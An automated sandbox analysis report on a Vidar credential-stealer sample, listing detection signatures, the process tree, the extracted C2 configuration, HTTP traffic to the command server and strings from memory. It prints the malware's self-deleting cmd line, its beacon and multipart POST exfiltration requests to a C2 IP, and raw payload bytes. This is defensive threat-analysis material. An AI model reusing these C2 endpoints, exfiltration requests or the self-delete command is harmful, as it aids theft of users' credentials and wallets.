Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	756295
MD5:	5367709f0a96713b5c9a518e13f306d6
SHA1:	244bdcc9a3548101cacc9c4f8912fb8631764b40
SHA256:	2cc0be582a350f1eafb6d3c6cc713393098a6936346a9070ba55abd346dfb090
Tags:	exe
Infos:

Detection

Vidar

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Vidar stealer

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Self deletion via cmd or bat file

Machine Learning detection for sample

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Uses a known web browser user agent for HTTP communication

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 5884 cmdline: C:\Users\user\Desktop\file.exe MD5: 5367709F0A96713B5C9A518E13F306D6)

file.exe (PID: 5924 cmdline: C:\Users\user\Desktop\file.exe MD5: 5367709F0A96713B5C9A518E13F306D6)

file.exe (PID: 5896 cmdline: C:\Users\user\Desktop\file.exe MD5: 5367709F0A96713B5C9A518E13F306D6)

cmd.exe (PID: 5984 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 3384 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Vidar

{"C2 url": "https://t.me/asifrazatg", "Botnet": "1148"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5896	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5896	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5896	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x43c08:$a1: BinanceChainWallet 0x43c1b:$a1: BinanceChainWallet 0x45d03:$a2: wallet.dat 0x6830e:$b1: CC\%s_%s.txt 0x6834d:$b2: History\%s_%s.txt 0x68cfd:$b2: History\%s_%s.txt 0x68339:$b3: Autofill\%s_%s.txt 0x68ce9:$b3: Autofill\%s_%s.txt
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
1.3.file.exe.526a20.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.file.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.file.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.file.exe.526a20.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.7fb280.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.7fb280.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Code function: 2_2_0040A392 __EH_prolog3_GS,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://t.me/asifrazatg

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /1148 HTTP/1.1Host: 88.198.94.71
Source: global traffic	HTTP traffic detected: GET /233910279258.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4550768666964492Host: 88.198.94.71Content-Length: 110914Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 149.154.167.99 149.154.167.99

Source: global traffic

HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 29 Nov 2022 23:10:04 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf

Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71

Source: file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://116.202.6.206:80
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71/
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71/1148
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71/233910279258.zip
Source: file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71:80/233910279258.zip
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71:80/233910279258.zip8C
Source: file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71:80/233910279258.zipd87633a38bb03555514232-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6
Source: file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257451716.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 58308559385186415876143610.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 58308559385186415876143610.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 58308559385186415876143610.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 58308559385186415876143610.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199439929669
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: file.exe, file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asifrazatg
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asifrazatg&
Source: file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asifrazatghttps://steamcommunity.com/profiles/76561199439929669http://116.202.6.206:80p
Source: file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4550768666964492Host: 88.198.94.71Content-Length: 110914Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: t.me

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0040E905 _memset,_memset,_memset,GetProcessHeap,RtlAllocateHeap,_memset,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,_memmove,lstrlenA,_memmove,lstrlenA,lstrlenA,_memmove,lstrlenA,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,_memset,lstrcat,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

Source: global traffic	HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /1148 HTTP/1.1Host: 88.198.94.71
Source: global traffic	HTTP traffic detected: GET /233910279258.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49707 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_004182AF _memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041E31F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00406050
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00405850
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042101A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004069EB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043127F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00432BE4
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004213EC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00420C7C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00430D2E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041B5A7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00421E20
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00431EAC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041D766
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00407F35
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004317D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004217D4
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004207E7

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00404114 appears 74 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00423610 appears 38 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00428900 appears 44 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00423679 appears 41 times

Source: file.exe, 00000000.00000000.231270305.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe, 00000001.00000002.232909854.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe, 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameHelper.exe. vs file.exe

Source: file.exe	ReversingLabs: Detection: 32%
Source: file.exe	Virustotal: Detection: 36%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: classification engine

Classification label: mal96.troj.spyw.evad.winEXE@10/6@1/2

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 82668342394913559298137947.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
